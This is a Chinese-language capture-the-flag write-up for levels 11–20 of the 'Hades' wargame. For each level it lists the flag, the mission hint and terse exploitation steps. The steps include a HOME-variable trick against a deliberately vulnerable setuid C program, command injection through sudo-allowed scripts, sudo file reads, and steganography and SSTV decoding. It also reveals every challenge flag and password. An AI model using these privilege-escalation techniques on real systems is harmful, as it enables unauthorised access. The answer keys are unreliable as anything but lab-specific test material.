跳到主要内容

Hades 11-20

User - asteria

flag - 11

^xSRhIftMsAwWvBAnqNZ^

任务目标

mission.txt
The user astraea believes in magic.

行动

ls -lah
drwxr-x--- 2 root    asteria 4.0K Jul 26  2023 .
drwxr-xr-x 1 root    root    4.0K Jul 26  2023 ..
-rw-r--r-- 1 asteria asteria  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 asteria asteria 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 asteria asteria  807 Apr 23  2023 .profile
-rw-r----- 1 root    asteria   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root    asteria  145 Jul 26  2023 mission.txt
-rw-r----- 1 root    asteria  161 Jul 26  2023 sihiri_old.php
Exploit it
TODO astraea 密码计算方式未知

User - astraea

flag - 12

^nqTHTzMzDPDJrKPCfVR^

flag - hidden - 0xS

SSH 直接连接
^KssHQIAFsxUamecyXIUk^

任务目标

mission.txt
The user atalanta has done something with our account.

行动

ls -lah
drwxr-x---    2 0        2004         4096 Jul 26  2023 .
drwxr-xr-x    1 0        0            4096 Jul 26  2023 ..
-rw-r--r--    1 2004     2004          220 Apr 23  2023 .bash_logout
-rw-r--r--    1 2004     2004         3526 Apr 23  2023 .bashrc
-rw-r--r--    1 2004     2004          807 Apr 23  2023 .profile
-rw-r-----    1 0        2004           21 Jul 26  2023 atalanta.txt
-rw-r-----    1 0        2004           22 Jul 26  2023 flagz.txt
-rw-r-----    1 0        2004          181 Jul 26  2023 mission.txt
Exploit it
artemis@hades:/tmp/tesssssssssssssst$ ftp localhost
Trying 127.0.0.1:21 ...
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:artemis): astraea
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
229 Entering Extended Passive Mode (|||15367|)
150 Here comes the directory listing.
drwxr-x---    2 0        2004         4096 Jul 26  2023 .
drwxr-xr-x    1 0        0            4096 Jul 26  2023 ..
-rw-r--r--    1 2004     2004          220 Apr 23  2023 .bash_logout
-rw-r--r--    1 2004     2004         3526 Apr 23  2023 .bashrc
-rw-r--r--    1 2004     2004          807 Apr 23  2023 .profile
-rw-r-----    1 0        2004           21 Jul 26  2023 atalanta.txt
-rw-r-----    1 0        2004           22 Jul 26  2023 flagz.txt
-rw-r-----    1 0        2004          181 Jul 26  2023 mission.txt

User - atalanta

flag - 13

^XXZbDJTQQWCHJWTGeOw^

任务目标

mission.txt
User athena lets us run her program, but she hasn't left us her source code.

行动

ls -lah
drwxr-x--- 2 root     atalanta 4.0K Jul 26  2023 .
drwxr-xr-x 1 root     root     4.0K Jul 26  2023 ..
-rw-r--r-- 1 atalanta atalanta  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 atalanta atalanta 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 atalanta atalanta  807 Apr 23  2023 .profile
-rw-r----- 1 root     atalanta   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root     atalanta  237 Jul 26  2023 mission.txt
-r-sr-s--- 1 root     atalanta  17K Jul 26  2023 weird
-r-------- 1 atalanta atalanta  927 Jul 26  2023 weird.c

以下为源码

#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <pwd.h>
int main()
{
    setuid(2006);
    setgid(2006);
    const char *filename;
    struct stat fs;
    int r;
    filename = getenv("HOME");
    printf ("HOME detected: %s\n",filename);
    char cmd[1000];
    FILE *out_file = fopen(getenv("HOME"), "w");
    FILE *fpipe;
    char *command = "/bin/cat /var/lib/me";
    char c = 0;

    if (0 == (fpipe = (FILE*)popen(command, "r")))
    {
        perror("popen() failed.");
        exit(EXIT_FAILURE);
    }

    while (fread(&c, sizeof c, 1, fpipe))
    {
        fprintf(out_file, "%c",c);
    }
    pclose(fpipe);
    pclose(out_file);
    r = stat(filename,&fs);
    struct passwd *pw = getpwuid(fs.st_uid);
    if (pw->pw_name != "atalanta"){
    r = chmod(filename, fs.st_mode & ~(S_IROTH)+~(S_IRGRP) | S_IWGRP );
    }
    stat(filename,&fs);
    return EXIT_SUCCESS;
}
Exploit it
atalanta@hades:~$ ls -lh /var/lib/me
-r--r----- 1 athena athena 21 Jul 26  2023 /var/lib/me
atalanta@hades:~$ id athena
uid=2006(athena) gid=2006(athena) groups=2006(athena)
atalanta@hades:~$ mkdir /tmp/tessssssssssssssssssssssssst
atalanta@hades:~$ touch /tmp/tessssssssssssssssssssssssst/as
atalanta@hades:~$ export HOME=/tmp/tessssssssssssssssssssssssst/as
atalanta@hades:/pwned/atalanta$ chmod 777 /tmp/tessssssssssssssssssssssssst/as
atalanta@hades:/pwned/atalanta$ ./weird
HOME detected: /tmp/tessssssssssssssssssssssssst/as
atalanta@hades:/pwned/atalanta$ cat /tmp/tessssssssssssssssssssssssst/as
kmQMpZsXgOsnzGReRcoV

User - athena

flag - 14

^oGwmbNYdtHwJgznZdur^

任务目标

mission.txt
User aura lets us use her new script.

行动

ls -lah
drwxr-x--- 2 root   athena 4.0K Jul 26  2023 .
drwxr-xr-x 1 root   root   4.0K Jul 26  2023 ..
-rw-r--r-- 1 athena athena  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 athena athena 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 athena athena  807 Apr 23  2023 .profile
-rw-r----- 1 root   athena  166 Jul 26  2023 auri_old.sh
-rw-r----- 1 root   athena   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root   athena  160 Jul 26  2023 mission.txt

脚本原文

auri_old.sh
#!/bin/bash
echo "What?"
read hackme
#Secure the condition!
#if [[$hackme =~ "????????"]]; then
#exit
#fi
#Add newest Aura pass!
#$hackme AURANEWPASS 2>/dev/null
Exploit it
athena@hades:~$ sudo -l
Matching Defaults entries for athena on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User athena may run the following commands on hades:
    (aura) NOPASSWD: /bin/bash -c /pwned/aura/auri.sh
athena@hades:~$ sudo -u aura /bin/bash -c /pwned/aura/auri.sh
What?
printf
TiqpedAFjwmVyBlYpzRh

User - aura

flag - 15

^YFMNmPnlKNpnWiYOhYy^

任务目标

mission.txt
User aegle has a good memory for numbers.

行动

ls -lah
drwxr-x--- 2 root aura 4.0K Jul 26  2023 .
drwxr-xr-x 1 root root 4.0K Jul 26  2023 ..
-rw-r--r-- 1 aura aura  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 aura aura 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 aura aura  807 Apr 23  2023 .profile
-rw-r-x--- 1 root aura  160 Jul 26  2023 auri.sh
-rw-r----- 1 root aura   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root aura  168 Jul 26  2023 mission.txt
-rw---x--- 1 root aura  16K Jul 26  2023 numbers
Exploit it
# 以探明序列:1231239111126
YRturIymmHSdBmEClEGe

User - aegle

flag - 16

^XCwOqgVvWpDVwPVVUJa^

任务目标

mission.txt
User calliope likes to have her things looked at.

行动

ls -lah
drwxr-x--- 2 root  aegle    4.0K Jul 26  2023 .
drwxr-xr-x 1 root  root     4.0K Jul 26  2023 ..
-rw-r--r-- 1 aegle aegle     220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 aegle aegle    3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 aegle aegle     807 Apr 23  2023 .profile
-rw-r----- 1 root  calliope   21 Jul 26  2023 calliope_pass.txt
-rw-r----- 1 root  aegle      22 Jul 26  2023 flagz.txt
-rw-r----- 1 root  aegle     176 Jul 26  2023 mission.txt
Exploit it
aegle@hades:~$ sudo -l
Matching Defaults entries for aegle on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User aegle may run the following commands on hades:
    (calliope) NOPASSWD: /bin/cat
aegle@hades:~$ sudo -u calliope /bin/cat /pwned/calliope/flagz.txt
^rFWOMwBJDidqSNtEJGJ^

User - calliope

flag - 17

^rFWOMwBJDidqSNtEJGJ^

flag- hidden - 0xM

^OCbFzMIKPQOZQMEUKwEi^

任务目标

mission.txt
The user calypso often uses write to communicate.

行动

ls -lah
-rw-r--r-- 1 calliope calliope  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 calliope calliope 3.5K Jul 26  2023 .bashrc
-rw-r--r-- 1 calliope calliope  807 Apr 23  2023 .profile
drwxr-xr-x 2 root     root     4.0K Jul 26  2023 .ssh
-rw-r----- 1 root     calliope   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root     calliope  175 Jul 26  2023 mission.txt
-r-s--s--- 1 root     calliope  16K Jul 26  2023 writeme
Exploit it
calliope@hades:~$ mesg y
calliope@hades:~$ ./writeme
Cannot send you my pass!Cannot send you my pass!Cannot send you my pass!TAMYefoHcCPmexwImodo^OCbFzMIKPQOZQMEUKwEi^Cannot send you my pass!

User - calypso

flag - 18

^pssqdorRTYuTKuQBOYd^

任务目标

mission.txt
User cassandra always wanted to be on TV.

行动

ls -lah
-rw-r--r-- 1 calypso calypso  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 calypso calypso 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 calypso calypso  807 Apr 23  2023 .profile
-rw-r----- 1 root    calypso 8.4M Dec 20  2021 cassy.wav
-rw-r----- 1 root    calypso   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root    calypso  164 Jul 26  2023 mission.txt

就是 SSTV 信号解码

img - cassy.wav

Exploit it
CKzlnvmHQz

User - cassandra

flag - 19

^lntvcYNlazEljOyZYKz^

任务目标

mission.txt
User cassiopeia sees the invisible.

行动

ls -lah
drwxr-x--- 2 root      cassandra 4.0K Jul 26  2023 .
drwxr-xr-x 1 root      root      4.0K Jul 26  2023 ..
-rw-r--r-- 1 cassandra cassandra  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cassandra cassandra 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 cassandra cassandra  807 Apr 23  2023 .profile
-rw-r----- 1 root      cassandra   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root      cassandra  369 Jul 26  2023 here.txt
-rw-r----- 1 root      cassandra  147 Jul 26  2023 mission.txt
Exploit it
┌─[randark@parrot]─[~/tools/SnowCracker]
└──╼ $stegsnow ../../tmp/here.txt.1
gRqFnHblmZVZSfegPLvO

User - cassiopeia

flag - 20

^GyWbcpEpqMsqMsjilzX^

任务目标

mission.txt
User clio hates spaces.

行动

ls -lah
drwxr-x--- 2 root       cassiopeia 4.0K Jul 26  2023 .
drwxr-xr-x 1 root       root       4.0K Jul 26  2023 ..
-rw-r--r-- 1 cassiopeia cassiopeia  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cassiopeia cassiopeia 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 cassiopeia cassiopeia  807 Apr 23  2023 .profile
-rw-r----- 1 root       cassiopeia   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root       cassiopeia  131 Jul 26  2023 mission.txt
Exploit it
cassiopeia@hades:~$ sudo -l
Matching Defaults entries for cassiopeia on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User cassiopeia may run the following commands on hades:
    (clio) NOPASSWD: /bin/bash -c /usr/local/src/differences.sh
cassiopeia@hades:~$ sudo -u clio /bin/bash -c /usr/local/src/differences.sh
File to compare:!
/var/tmp/tesssssssst\x0/pwned/clio/flagz.txt
0a1
> ^XUJbvPwAZYgoUgkpeSv^